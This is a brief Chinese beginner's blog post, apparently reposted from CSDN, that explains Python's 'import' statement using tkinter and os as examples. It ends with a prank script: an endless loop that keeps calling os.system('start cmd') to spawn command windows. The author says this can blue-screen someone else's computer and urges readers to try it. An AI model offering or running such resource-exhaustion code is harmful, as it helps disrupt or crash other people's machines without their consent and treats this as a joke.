其他分享
首页 > 其他分享> > 【无标题】

【无标题】

作者:互联网

如果让我来写一个程序,可能第一句就是

import

OK,话不多说,来讲一讲这个模块

这个模块就是导入……的意思,比如说tkinter

import tkinter
import os

看出来了吗?没错,句型就是import(空格)(库)
怎么样?
只要懂这个句型,蓝屏别人电脑不是分分钟的事?不信,举个例子:

import os
while True:
    os.system("start cmd")

试一下???试一下???

标签:tkinter,句型,无标题,模块,import,蓝屏,os
来源: https://blog.csdn.net/LB11045/article/details/121886265